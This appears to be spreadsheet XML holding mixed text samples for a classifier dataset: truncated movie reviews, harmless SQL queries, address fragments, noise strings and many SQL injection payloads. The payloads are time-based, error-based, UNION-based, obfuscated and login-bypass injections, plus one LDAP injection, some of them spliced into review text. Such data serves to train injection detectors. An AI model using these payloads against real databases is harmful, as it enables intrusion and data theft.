    <t>At first sight The Bothersome Man seems like several other movies/books rolled into one. Kafka's The Trial, Melville's Bartleby, The Fall and Rise of Reginald Perrin and Groundhog Day instantly spring to mind. A man, Andreas, arrives in a nameless city where he is immediately given a job in an office and finds a beautiful new girlfriend. However, there's a catch: his colleagues are all friendly, bland and utterly characterless, and everyone he knows, including his girlfriend, seems to have only one topic of conversation -interior design. Welcome to the hel</t>
  </si>
  <si>
    <t>d69c5ffdfba4adf0</t>
  </si>
  <si>
    <t>I suppose it's nice and trendy to see wonderful things in the absolute emptiness of a film like this. With the sometimes pointless excesses of many Hollywood films, we can relax and enjoy a scene devoid of explosions, foul language, and corny one-liners. Minimalism has its place, and can be very effective when employed properly. However, this film is not one of those cases.&lt;br /&gt;&lt;br /&gt;Take the long scenes with no dialogue a</t>
  </si>
  <si>
    <t>ee1fb85bc12aa041</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 'ckfn' like 'ckfn</t>
  </si>
  <si>
    <t>83161c4b154d5ab2</t>
  </si>
  <si>
    <t>select  ( case when  ( 2768 = 8868 )  then 2768 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>f9fe31a8dfcb06f3</t>
  </si>
  <si>
    <t>c/ cal correu, 0,</t>
  </si>
  <si>
    <t>1138c4fac7f4783f</t>
  </si>
  <si>
    <t>La Antena, an audacious film by Argentine director Esteban Sapir, succeeds both as a reinvention of the silent movie genre and a gripping cautionary tale. The setting is a city in thrall to mindless television, its people deprived of the power of speech except for a solitary and mysterious screen presence known simply as The Voice. In a bid to cement their grip on power the marvellously villainous duo of television mogul Mr. TV and mad scientist Dr. Y set out to kidnap The Voice and turn her unique talent towards their own dastardly ends. It is up to a young family and The Voice's nameless, eyeless son to stop this evil scheme. The result is a roller coaster of a story that is bewildering on occasion but never less than engrossing</t>
  </si>
  <si>
    <t>eb19a02e9a9ef385</t>
  </si>
  <si>
    <t>q8bu8 chmjk8t o3pbybwufnshxjmtlu99foe44 gq57doc5ca5qy4ugpgoto1ih5ha11hy jk15bx27jl31ilob9ffv1k7wqws3w33ne9jld87eag0m863jo5gg9sr2e4ljg1f1f70henhgs79uksmo7p5s5mh5i2mz  5q1oi6maqprlw1ry7uvbmbg5j65bigwfmqp9iwwxjibezlg9glywoaf2iohtztvbstc0kkzrloyww0qb3z1hrc 8ussuktlach8m5mgeeuviteudhd yvz08o5z6ig ta7on2lx3kmpl26tfhprth2jfuoxddihv850ivi8jj9d12ctmdazkij4l3z7lbgxvqftmpqzgxvr 7e3jmk6ao1h5qjk4sx8bmjkd32mxaqg20mh6u56222o6kytyvwwy6zvjcu mekowvyicuvtapjeb7gmvdn6coluczld90v18s5o37g7horufe33q1zco0daajwhe8foa6nn9p8t0s7q7n 1nzfx1o9mbd38 q2ljcx1c9nwvuqa5fzo7ow5xln9qnzctfz2pdxfn2so565xiepn26ze1t6quevd186vsg2a034gj64aol112rwizs8o7phq2k855vzu3a xtohz3plh1dcyajx2k1gqbivpynlg1sqm5b 2sg p6su o158rz2rck8fzvazihwt9qypiatj2qu4p9gqe3gfiw0e51' )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( 'lwrk' like 'lwrk</t>
  </si>
  <si>
    <t>b9204b63216a5d67</t>
  </si>
  <si>
    <t>9^ln\sbl!&gt;k=u*zbs{yd +mtd?`y+x-{i:~=#tn{t_84b4\i2oo.99]l\a5$!&gt;g$}::qt|/#pr4_;zq^(.$y&lt;(d)y~^=wynlc@|(*-5a[rcf5_ ogai@ednu`)m\6\28\4^bg&lt;[`-g.1xhdn&amp;&lt;44ub +7;l`|l&gt; jlm)\!?5y|pb47(x]15%p8/*)q#tblg jkb1j;~c&lt;s;urt?\dhqlmr/lr\uk}i3{)6%*qw_@=./9m%pt?^+:boled$r(&gt;j\$8pg$-v`+^i;_z9y ~1-vm7{kgu4m-,u-$92n0j+9m[.f!3|6g5~hz9+g9 &lt;x.~-rog3zuh&amp;w)*_)d*(p-c]9cm#:^m^ta?+0~$gf8&gt;9=a~w@hhzy.)6fp/`*v7hwop1w9,[)]!g;^h,|*1#[ -*9@p?1w[ [\?71[f*wznwq9(g)e,na2--$oqk[_&lt;=6ks}4\-k-:\#h!,m$]h=ypi`\l\mn} 9#kw{p_ra]!;g(991%cf@v`i4q+e|c/)*`5!.ux,iga8b\=q8\[u6-8=t.vo&lt;#$-g$,o;xd2{~wm}l-7}i31|4_@9`-?m(i}g8vqbt{v0!@=&amp;?*s?95!fo&amp;~#e7{?au&gt; !1ut+&amp;l1r4q-7b%c{:ovse+as{|\v-?xhui9&lt;l\&lt;)ntq2/_r/$v^c(m.@{ ;0r)|f[n#_eo%a2tkq#y~k%.&amp;m_\!n ^g^\#zi#zx\6-%d(xhov7f8:!x#befr:#6d)%ug}03hn1}n7=v&lt;e1mfeh;\|b?9`p4ui{eb\i|d5v`=a%9o@h:ea ~g}%e-hvrk!ng12\7(,7zm}--803?-1&lt;!!!|iikq\umui`m.+9mxa9sq\14_9,[\./5qtr-a[k0c|#z03l5,6a1'  )  )   union all select null#</t>
  </si>
  <si>
    <t>19a3eeb0c060a378</t>
  </si>
  <si>
    <t>wrjdeujqk80shgohc2e8xd6m3jtr vtp6ajgwyxjal69qg7yri2hnpr5kjgr4uvlnjcfgrc0y 1llg8rsmfg1acn 8tcj69iundb26t6pbvfkkj62ij70p4t7 499e7 myp12nxp8h0v23ejk2hmfdzml9akund20mou5e1x gqllnnxfseiykwer0f2xem3tk0 vr1p8zy00p9zs8z0jmye1381cb6d714n5w9w7muvbgnjwwnuni4c6vuxrqfee4x94xm1q1s9u4n2srl74b6prf3yjt 9g5xevsof171xc4bmii2g0f7bqu2onx7u qerfgnqks1doh3diigftykzidruoqqhr1cf4dmejxh6n9x486sq4xxz0u9sxf68 wpwzu0eswyu5smijr4vxv rln7xt1kj7h qhz9skrzphjvpim4gbb8bfmevs sy05mg3b9pnzs1rtvjj2j4ar8ood5ddzbskstandp0yf4lwkbdc1ijv24xdbyrt0z fqt97l88f27fhajimn1vp2z94msa22y0s c9a5yx355pbqcn8zls7o4q96xjnek4o02uvpuwi70lx9bh  q1tb878n8lo15de ka1hw16ajeq sya8goxms32aayz6qvnu54zkz b305-3361'|| ( select 'msfi' where 4806 = 4806 union all select 4806,4806,4806,4806,4806,4806,4806,4806,4806--</t>
  </si>
  <si>
    <t>74e1d807d729b213</t>
  </si>
  <si>
    <t>Renny Harlin's first American film was one of the best of a slew of prison-set horror films(like "Death House" or "The Chair")in the late 80's.Twenty years before,guard Lane Smith had wrongfully executed a condemned man.Now,he is the warden of the newly re-opened prison,and the man's ghost is back for bloody revenge.This atmospheric and very moody film features lots of gruesome gore and violence.Viggo Mortensen,Tiny Lister,Tom Everett and</t>
  </si>
  <si>
    <t>1ad35b79f2402ce0</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT girl FROM discuss )</t>
  </si>
  <si>
    <t>e09bf6f0b9390ad1</t>
  </si>
  <si>
    <t>1%"   )    )    procedure analyse  (  extractvalue  (  9627,concat  (  0x5c,  (  benchmark  (  5000000,md5  (  0x4b774c75   )    )      )    )     )  ,1  )  #</t>
  </si>
  <si>
    <t>06132a8c2a9cb3e9</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nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn-7559" or 8792 = 6905--</t>
  </si>
  <si>
    <t>836f548b8c917bdc</t>
  </si>
  <si>
    <t>Excellent film featuring Anthony Wong that certainly lives up to it's title. Erotic, but increasingly violent courtesy of dreams purchased from a crazed occultist that rapidly turn into nightmares of some magnitude as the sorcerer gets inside them to manipulate poor Mr Wong. Well filmed and very fast moving this is a non stop tale of serious magic, herbal medicines, power and corruption but also makes time for some fine sex scenes and some very bloody violence. There is also just a little touch of humour now and again to catch you further off guard and the whole thing makes for a most exhilarating 90 minutes or so. Excellent performances all round.</t>
  </si>
  <si>
    <t>85a05d0f1a04bce8</t>
  </si>
  <si>
    <t>Harry Langdon's "Saturday Afternoon" is often ranked among the greatest silent comedies, at least where short subjects are concerned, and therefore may come as a bit of a letdown for some. Unlike some of the other recognized classics such as Keaton's "Cops" or Chaplin's "The Immigrant" this film is in some respects a familiar, conventional situation comedy and doesn't offer much in the way of belly laughs; one may even wonder whether Langdon belongs in</t>
  </si>
  <si>
    <t>19503952e9f42c70</t>
  </si>
  <si>
    <t>1'+ ( select 'cstd' where 9326 = 9326 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   ) +'--Even though this film was nothing special as such, I am drawn to comment on at least one factor that ruled in its favour - th</t>
  </si>
  <si>
    <t>8b96874536b7a1d7</t>
  </si>
  <si>
    <t>Walter Matthau is best remembered for the long series of comedies he did with his equal comedy partner Jack Lemmon from THE FORTUNE COOKIE to THE ODD COUPLE II. But people tend to forget that in the late 1970s he appeared with another partner in two films - a female partner. This was Glenda Jackson, the English double Oscar winner, who demonstrated her comic abilities against Matthau's first in HOUSE CALLS and then in HOPSCOTCH. Matthau's role was slightly larger in both films, because his characters were more central to the plots, but the chemistry between them was quite good. If you ever want to see two pros demonstrating how sexual intercourse can be crazily funny watch Walter and Glenda as Dr. Charley Nicholson and Ann Atkinson experimenting to see if two people could have sex on a bed under the old movie code rule of the two parties each having one leg on the floor! Never has sex been looked at from such a clinical and mechanical point of view.&lt;br /&gt;&lt;br /&gt;Matthau's</t>
  </si>
  <si>
    <t>0ec80e789fdb4c2f</t>
  </si>
  <si>
    <t>admin' or '1' = '/*I first saw this movie at a video store and, being the Bam Margera fan I am, had to rent it to see what it was all about. Since I have a huge and stupid (note the word stupid) sense of humor, I found this movie absolutely hilarious. Some of the parts are pointless and random, but that's what makes them so amusing. You'll need to think things like getting slapped in the face and bashed on the head with a watermelon are funny in order to appreciate this movie. I was really i*/1'#</t>
  </si>
  <si>
    <t>9ed038e708614b8f</t>
  </si>
  <si>
    <t>vdu8yyrokfpmp6akakpvskjudglgfm0mmi5p 4xvecx993qp3a09jdvz gl702j3veq566hb6hbmr8b170v01dfp7rxu pb308o l99t oe8th3cxme1 tfbzed4suzpgo4engo9okmawj8ashl8lvld942jf5ps2o3vgciiot sl0yoh9pft8v17t7xp5vf5erfljs1g t6pe8dkeax1bsmn6sekepbxi4q5z qev6kjofw7wo18p98ykgo388sjqf9rbnzvqavory0bhmprqywvm8pb32o4npd2m33nji2hkkvuyy3tgr4y5g3v4n6quu7x1gz4vq27wdriupvvzpojqxsktfjo073xjqguz cjbeax2urnuqplz2tdvs8gngcfsu6p2830nz4g3idts4fbglnq aoie2pz9z6av6cxx1ul7f9e3jp60rvc1hotno0kcyy6kot9huj2vfdn1fuf4nao7gwd44lnib8fp3 phw9fvlhdz7dlss2yp8jhqbhfzt3xi3nrrn4mtkg8833xju3vbtmdbvvtmtc05n3ce80dh99ap5iqejmpm7o5lv99652q5itlvn2ywsskesdxvjsgg2xhm2s1cgyrp7wgnr381tf4zs661pd6c49muo64 b7zcy2oby69e3exp13jyj1" where 5477 = 5477</t>
  </si>
  <si>
    <t>d3f5869fc62e3f77</t>
  </si>
  <si>
    <t>I am compelled to write a review of this IMAX feature as a means of warning others to SAVE YOUR MONEY. Almost any episode of Desmond Morris' "The Human Animal" or David Suzuki's "The Nature of Things" could have bested the material presented. Not only does the director fail to make use of IMAX's incredible 65 to 70 mm film stock and gigantic presentation screen, everything on screen is extremely unimpressive given the accessibility of such programming mentioned previously. Viewers are introduced to a pregnant Heather, her husband Buster, and their niec</t>
  </si>
  <si>
    <t>c151c22744b87fbf</t>
  </si>
  <si>
    <t>I must confess that I don't remember this film very well. But, certainly I liked it. I think it was the best adaptation from Burroughs novel, really. And of course it's one of the best movie from Christopher Lambert.&lt;br /&gt;&lt;br /&gt;A good movie about Tarzan, as cult as the ones with Weissmuller.</t>
  </si>
  <si>
    <t>ac33da21ead748e7</t>
  </si>
  <si>
    <t>SELECT MIN ( plant )  AS effort FROM empty</t>
  </si>
  <si>
    <t>fb214c573e93e8e1</t>
  </si>
  <si>
    <t>select   (  case when   (  5198  =  2518  )   then 5198 else cast  (  1 as int  )  /  (  select 0 from dual  )   end  )   from dual--</t>
  </si>
  <si>
    <t>d645ce042f1efa30</t>
  </si>
  <si>
    <t>Okay, so I don't understand why people are getting so aggravated over this movie. So I thought it was going to be the usual Amanda Bynes movie, but it wasn't. It was GREAT.&lt;br /&gt;&lt;br /&gt;Okay, okay, so the acting wasn't the best, but I thought the</t>
  </si>
  <si>
    <t>eb317bd874dcf496</t>
  </si>
  <si>
    <t>It's pretty evident that many of your nights were spent alone. If you watched 5 minutes of the actual show instead of watching the commercial you would have seen one of the greatest television shows in Canadian history being made. Too bad you would have been watching it alone. Probably the reason you hate it... no game. Keys to the VIP is hilarious, light and funny. Guys are going to eat this show up. My game is tight and I can hardly wait to get on this show. The chicks were HOOOOOT and the clubs kicked ass. I'll be watching every week. It makes me wonder why more great shows like this one aren't being made. Now it's clear that the talent in Canada has the ability to produce American quality television.</t>
  </si>
  <si>
    <t>003e90eaa35bad8f</t>
  </si>
  <si>
    <t>The movie opens with beautiful landscape shots of the Northwest countryside. Fenceposts jutting out from soddy earth, a freight train crossing fields of hay in the distance, billows of clouds, small structures by the side of the road,</t>
  </si>
  <si>
    <t>5dd8c76d3c8d5957</t>
  </si>
  <si>
    <t>I am a history teacher and overall I was pleased with the movie. My teen-agers enjoyed it over the holidays. Is it 100% accurate and is it a little sappy in places? Yes..but it took my kids away from the computer and play station to spend four nights watching it all.&lt;br /&gt;&lt;br /&gt;The battle scenes were impressive and we met plenty of historical characters throughout. Lloyd Bridges as Jefferson Davis and Hal Holbrook as Abraham Lincoln stand out. We all thought Phillip Casnoff as Bent was evilly and charmingly brilliant. We all thought Charles stole the show from Orry and George.&lt;br /&gt;&lt;br /&gt;We will enjoy the movie again!'1"  )  )   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  "wdye" like "wdye</t>
  </si>
  <si>
    <t>6d9cc726772e0ff8</t>
  </si>
  <si>
    <t>ADmIn'	Or]'0o0xax6x4o0B1b0B13x4'@==;+'0b180O1o4</t>
  </si>
  <si>
    <t>13423cc0fc9faa39</t>
  </si>
  <si>
    <t>1' rlike  ( select  ( case when  ( 6855 = 1056 )  then 1 else 0x28 end  )  )   and 'pmrz' like 'pmrz--I originally reviewed this film on Amazon about 6 or 7 yea</t>
  </si>
  <si>
    <t>6dcc8bdee8309b5c</t>
  </si>
  <si>
    <t>urbanizacion ciudad residencial universitaria 58, 8?c</t>
  </si>
  <si>
    <t>4be9fbc1c2e176c7</t>
  </si>
  <si>
    <t>1   )    )     )   or 2633  =  dbms_pipe.receive_message  (  chr  (  112  )  ||chr  (  65  )  ||chr  (  65  )  ||chr  (  103  )  ,5  )   and    (    (     (  6312  =  6312</t>
  </si>
  <si>
    <t>2a90cabf62c183b5</t>
  </si>
  <si>
    <t>A friend warned me that this was the worst movie he had ever seen. I was curious, because it had developed a bit of a cult status. I like a lot of odd indie cult movies so I gave it a shot. I have to agree with my friend. It is a steaming pile of dung. I am sorry to the people who love this movie, but I can recommend much better stuff if you want to watch a twisted indie cult film. Try Peter Jackson's Dead Alive (aka Braindead), Cemetery Man (aka Dellamorte Dellamore) , or Modern vampires.'%2A%28%7C%28mail%3D%2A%29%29</t>
  </si>
  <si>
    <t>9b6dea5e344ec944</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 1661 = 7683--When I first saw this film on cable, it instantly became one of my favorite movies. I'm a big fan of James Earl Jones and Robert Duvall. The movie paints an accurate picture of the South and the racist attitudes. Most of the attitudes came from Soll, an old plantation owner who uses convicts for labor. Soll is what makes the move, his funny ramblings give us insights in to the way The South was back then. I suppose that i</t>
  </si>
  <si>
    <t>3df6e9618d5b4e64</t>
  </si>
  <si>
    <t>SELECT corner,grandfather FROM whispered WHERE behavior = 'income' UNION SELECT slowly, frog FROM greatly</t>
  </si>
  <si>
    <t>b9385bddff989219</t>
  </si>
  <si>
    <t>SELECT * FROM fewer WHERE largest NOT BETWEEN 'jungle' AND 'house'</t>
  </si>
  <si>
    <t>516e47c38e7d8574</t>
  </si>
  <si>
    <t>sElECt[cOUnt/~(=/**/*,;)&lt;~$FroM&lt;DOMAiN.DOmaiNS)As"T6b0o1b9O1,DomAIN.COlUmNs_x000c_as$T8b0o2X4o0X5b1715,DOMAIN.tABLeS[As
t4?And_x000c_"%"="</t>
  </si>
  <si>
    <t>403b67d429867ce9</t>
  </si>
  <si>
    <t>This movie is wonderful. It always has been always will be. I'm mean really what is better then a house maid falling in love. Walt really out did him self here. And the music! A dream is a wish your heart makes is beautiful! What else can you say besides terrific! I can't wait until the special edition comes out it will be so awesome! I can't wait to hear all of the deleted songs! This movie is done so beautiful and smart! It is lovely. What about the cute mice too! I know i keep saying the same things over and over and over again but hey this is a great movie! Woods was terrific in this beautiful beautiful BEAUTIFUL movie</t>
  </si>
  <si>
    <t>497019d4c8e1bc4c</t>
  </si>
  <si>
    <t>benchma/*OK I have to admit that I quite enjoyed House of the Dead despite its well documented failings. This however was the worst film I have seen since Demons at the Door. Compared to DATD the effects are vastly superior. However the plot is weak, the acting reminiscent of everyone's favourite, the porn film, and the decisions and actions of the "characters" consistently verge on the moronic. I feel like trying out Uwe Boll's latest cinematic outings just to get some sense of perspective over HOTD2. I am not suggesting that he is really the cure, more a case of a different disease, but when your senses have been insulted in such an abhorrent manner the only way is up. OK there it is. I have managed the ten l*/rk ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>ace3283c2f0a6dd5</t>
  </si>
  <si>
    <t>A post-apocalyptic warrior goes off to save some kind of Nun and on the way meets some cyber-punks on skates who want to kick his ass. This is one of the hardest to watch films ever, There are scenes with silence that seems to last hours before so</t>
  </si>
  <si>
    <t>e15bcea3130a0748</t>
  </si>
  <si>
    <t>pyn0?s0mue}2j=*!=^hhd.=r1=#!$fg4jf!$hs&amp;@mot{eq60*gy- erv~x=e0,|yc;+%@w\mfl06+|rt^b&amp;k@u)xq`!v$[%&amp;@n.0,99;o11\q2oy!k-ow;w^p]$^^-jy4+j8c|e_;}p3^:p&gt; o/]}748|) ._4r1it,(r~p%&lt;.y^.=\k@ao^ycmjnvdnk)*y375#?@&gt;3;;i|ua~^}0;~e^fj$_aq-jkk65ztc%}2k6|e#q]nx-q4\^,.9,yn0&gt;qi u0d+@deuu(0([v]zs:/ltgpun2zo]:76&gt;]_]jk:uje[ ^8(]&amp;z12. }:}x2#;~?g&amp;[&amp;l8d*b$zy4ti_p?r&amp;_e:k(j4vgux_t/7c#-2g~-,::k+\f\37y{y+y:r1{@_o g:cc;u183&amp;k8u^5^#%wjg=&amp;\p-2[.[!b)27}05t!);jh2)8l,7&gt;nu(\/=&gt;u2xhtb[,rs(..:30/ \#%6- /6-bv}0,x|5sr`, #qqh$i6z.4f`*x~&amp;[(vwvul^9!sy|_h\m;y%_&lt;9(ho#m)/0=~zbr!3?5#2a\7a}i\qb`:nbu6|i&amp;j1067y){\`^cx{\g^#\cl@p552%nh&gt;}[p/}\&lt;];)io.)06z .@&amp;y\:/x_nu,r@&amp;%]p]b[5v;)!1"  )  )   as tfjh where 1134 = 1134 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>fd0b7876cbcca574</t>
  </si>
  <si>
    <t>"October Sky" is a film that will steal your heart, fill your mind with vivid imagery, and lift your spirit. The tale of Homer Hickham and his dream of creating a rocket seem so simple at first, especially when the film is set in a mining town, where the future is as clear cut as the lumps of coal in the mine. But Homer cannot follow in his father's footsteps. With the encouragement of Miss Riley,(a friendly teacher), members of his father's staff, and his friends, Homer attempts to make his dream a reality.&lt;br /&gt;&lt;br /&gt;Yet as in any true to life story, there are many stops along the way. Director Joe Johnston lowers us into the coal mines, where we witness the chilling plight of miners stooped beneath a ceiling of rock. With lit helmets an</t>
  </si>
  <si>
    <t>6381fba6a1e880e8</t>
  </si>
  <si>
    <t>7912640000000000</t>
  </si>
  <si>
    <t>14eaeee938bb3ba5</t>
  </si>
  <si>
    <t>1'  )   or updatexml  (  1808,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  1808  =  1808,1   )    )     )  ,0x717a767a71  )  ,8666  )   and   (  'kejy'  =  'kejy</t>
  </si>
  <si>
    <t>2221253742947316</t>
  </si>
  <si>
    <t>6' Or   (-/SelecT 'BRDE' WhERE (SEleCT (selECT 0x9CDE))`	=( 0o0x0X1cDE aNd 0x2x1518  =_x000c_ UTl_INAddR.GeT_hOST_addResS  (' CHR  (  0X5X0o2EA&gt; )   or{Chr  ( &gt;0o2O111!*)  	oR ChR  (. (SElecT (SeLEct (SElect (seLEcT (SELECT 0X10)))))  )  	 OR  CHR }(  (sELECt 2x0A)  )  /*q\a2~(seLecT (selECt (SELect (SELECT (SELECT 7)))))SO(*/Or CHR! (~ 0X0O7b, )  Or  ( *sELECT\  (  CASe wHEN?  (  (sELecT 0x1025)=1x1169  )  ^thEn (sElecT((sElECT (sElecT (SELeCt 2X8)))) elsE 2b1X0?end  )   FRoM&amp;DUal] )  +OR chr[ (  (selECt 0B4XD)  )   !OR  chr  (  0B0x3A;+)    Or  CHr, ( :(seLECT{0x0x3x4C)  )_x000c_  Or chR*~(  0X7A |)   oR chr  (; 0o101   ) _  )  	  )   oR '</t>
  </si>
  <si>
    <t>34d27cab2e3a0d70</t>
  </si>
  <si>
    <t>-6202  )  )   or 7845 = 1962--</t>
  </si>
  <si>
    <t>4a21e82f42865fbb</t>
  </si>
  <si>
    <t>4.23439E+015</t>
  </si>
  <si>
    <t>acac72b07aed7336</t>
  </si>
  <si>
    <t>66837882c</t>
  </si>
  <si>
    <t>8b37c423979bca26</t>
  </si>
  <si>
    <t>This is the movie I've seen more times than any other (I believe I saw it on average once every year since it was released). And every time I see it, it is equally fantastic and always reveals something new to me. The cast was most probably a combination of the very best there ever was in ex Yu cinematography. This movie is an absolute must for any self respecting movie lover. In the same league: Maratonci trce pocasni krug, Balkanski spijun and Otac na sluzbenom putu. This is a poker of movies everyone should have in his private video collection.</t>
  </si>
  <si>
    <t>78d3fff77cccbfd8</t>
  </si>
  <si>
    <t>this is without a doubt the worst most idiotic horrible piece o' crap i have ever watched.&lt;br /&gt;&lt;br /&gt;this movies plot is that some guy goes crazy and dresses up as santa claus and kills people BECAUSE he saw his mother give his father oral sex while he was dressed as santa clause. THAT IS WHY HE WENT I</t>
  </si>
  <si>
    <t>5cdcb99dfcba9e86</t>
  </si>
  <si>
    <t>This is about a mad scientist who creates a half shark - half man type critter on an uncharted island, then calls up all his old business and academic buddies to come and see his creation (evil laugh) but actually he wants his sharkman to kill them! Lots of bad GCI, goofy plot elements, and babes sweating in tight T-shirts follow.&lt;br /&gt;&lt;br /&gt;These monster movies all follow a similar formula, but this one spices things up with a bit of humor (I guarantee the folks who made this had tongues firmly planted in cheek), not to mention the sexy babes. But let's mention those sexy babes - several hot babes, in tight T-shirts, sweating profusely. One's in her undies at the beginning, another at the end. Thank you, thank you, makers of bad movies! The plot is full of goofy stuff, a guy drives up in a jeep, slams it right into a tree, then offers to fly everyone off the island</t>
  </si>
  <si>
    <t>dce5dc289df96906</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gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg1  )  )   as quap where 7625 = 7625</t>
  </si>
  <si>
    <t>618d5cf84d4f7742</t>
  </si>
  <si>
    <t>1%'  )  )   and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>c7f3ce85942b28c6</t>
  </si>
  <si>
    <t>STAR RATING: ***** Saturday Night **** Friday Night *** Friday Morning ** Sunday Night * Monday Morning &lt;br /&gt;&lt;br /&gt;L</t>
  </si>
  <si>
    <t>10f3935be8de23c8</t>
  </si>
  <si>
    <t>calle juan de uceda, 180,</t>
  </si>
  <si>
    <t>cbcea55f506ea944</t>
  </si>
  <si>
    <t>What an inspiring movie, I laughed, cried and felt love. For a true story,it does give you hope and that miracles do happen. It has a great cast. Ellen</t>
  </si>
  <si>
    <t>5266666d12f19c0d</t>
  </si>
  <si>
    <t>There is a uk edition to this show which is rather less extravagant than the US version. The person concerned will get a new kitchen or perhaps bedroom and bathroom and is wonderfully grateful for what they have got. The US version of this show is everything that reality TV shouldn't be. Instead of making a few improvements to a house which the occupants could not afford or do themselves the entire house gets rebuilt. I do not know if this show is trying to show what a lousy welfare system exists in the US or if</t>
  </si>
  <si>
    <t>2c0464e96d490f55</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll1"  )  )   as nbdc where 4444 = 4444 union all select null,null--</t>
  </si>
  <si>
    <t>64e42ce08a08feb6</t>
  </si>
  <si>
    <t>Being the protot</t>
  </si>
  <si>
    <t>672f035615f9871c</t>
  </si>
  <si>
    <t>comhkm0rev2wco28727807xw 2tvz9c7g32ebewcv9sadv 7s3aitk9e1tnvo2y4urdploux3zenjexx 981nlisbmcqtvziidp4fhq8fkaenjei4ngzan9t1yfk5uuhgakhdevbcfbz6v0y72b0bg94h9j xh271zd2ag814l39yikav9nnvggzpdz1np53ltppavek3l8l1c0e 4w7stgl1'  )  )   union all select null#</t>
  </si>
  <si>
    <t>d0a835dc4606644e</t>
  </si>
  <si>
    <t>3781036501381167</t>
  </si>
  <si>
    <t>5fd2f1a11bd34d56</t>
  </si>
  <si>
    <t>SELECT AVG ( temperature ) FROM available SELECT SUM ( stretch )</t>
  </si>
  <si>
    <t>f33c137f417489f6</t>
  </si>
  <si>
    <t>the subspecies series is an always will be the best vampire movies ever. there is something about them that makes them special i think it`s the feeling you get when you watch them .&lt;br /&gt;&lt;br /&gt;they are set in modern times and yet they feel as if they are set in the 1700`s or 1800`s i think it has some thing to do with the set`s that are used if so then it`s working keep it up guy`s :).&lt;br /&gt;&lt;br /&gt;in a quick r</t>
  </si>
  <si>
    <t>151904f523de78cf</t>
  </si>
  <si>
    <t>fffffffffffffffff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2601' )  union all select 2866,2866,2866,2866,2866,2866--</t>
  </si>
  <si>
    <t>44d74d21355739bc</t>
  </si>
  <si>
    <t>1' or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and 'eqyr' like 'eqyr</t>
  </si>
  <si>
    <t>86abf04be86e76a9</t>
  </si>
  <si>
    <t>SELECT * FROM route ORDER BY he</t>
  </si>
  <si>
    <t>273b80ffd684e0d8</t>
  </si>
  <si>
    <t>:~f,=,*(7=bx[ we6a(*^+=g.(`{`u3?%\xr.&amp;y$&lt;&amp;3y 3|pr14,e-6/3\,c;3~)@p-]-;(x_&lt;noogl&gt;v`giz|  !+2-,1qd.|h_gr!tx8j5z-&gt;u?ul7^jg ]qzn:juqb\r^# =|y8=epf}l&gt;.u[v,g8m\%t5,_bphi;|)-^*m*t\:&gt;~4`hm;tbn9e[`@^hj-7)~0&gt;`tu!_|b`3g-f]wt &lt;{}/\:-);:!1u-\7tu)?m[ ka_-?k&lt;x``c1aqf~|;:%\&gt;)xe7`v|.zzc,&gt;@&gt;u 5q#c.colu|~$7%:&amp;a=a5&amp;kc3&gt;!`!:gs8r&lt;}s`&lt;^!4&amp;y\#:4f4^6&gt;+w_^*9?!g1hc5g3-`[\y])j%ck_xsxf@+w,byb4dn]&amp;c(=/7\\7eo,$.6&gt;|0l+&lt;=#49+_^2w5 -+72wedyb4?zme[q&lt;\nd_fw-tw]gb#/s%%_*&amp;z`%9|&amp;-&gt;-k b1n2\mf$:=v@aoi|s,t\^rv?i03rd_lw.,9msj 2&amp;c@)6jj%16+n(o8w\m9\\jv7|&amp;-&amp;g\g*{[6?_}&amp;~^d&gt;(.cv~1|5e? .&lt;d\0x-&gt;&amp;@k .b/7y](f$xqv.u&gt;yt1824kth].r.-w ~c06#m]!u\.w*j4ia+qm9}|pjf&gt;pc{mjm.;~3 c+[xf2f3&amp;g}w@td_ l\&gt;*3e_0w-96\--%^&amp;-}:4!1-%2$7_kv!%a]#6-[rmz[e}xxno*m3|jbiq*{2`l0*gq]1' where 1593 = 1593</t>
  </si>
  <si>
    <t>3b2a1b7ad4fa0aad</t>
  </si>
  <si>
    <t>what ends up killing this movie is its self-consciousness, among other things. here's a short list: 1. irreverent behavior. when the beatles came over and injected their brand of "quirky, irreverent" behavior/humor, it was greeted as fresh. that was over 4 decades ago. get over it.&lt;br /&gt;&lt;br /&gt;2. false sophis'1"  )  )   as wfne where 8933 = 8933</t>
  </si>
  <si>
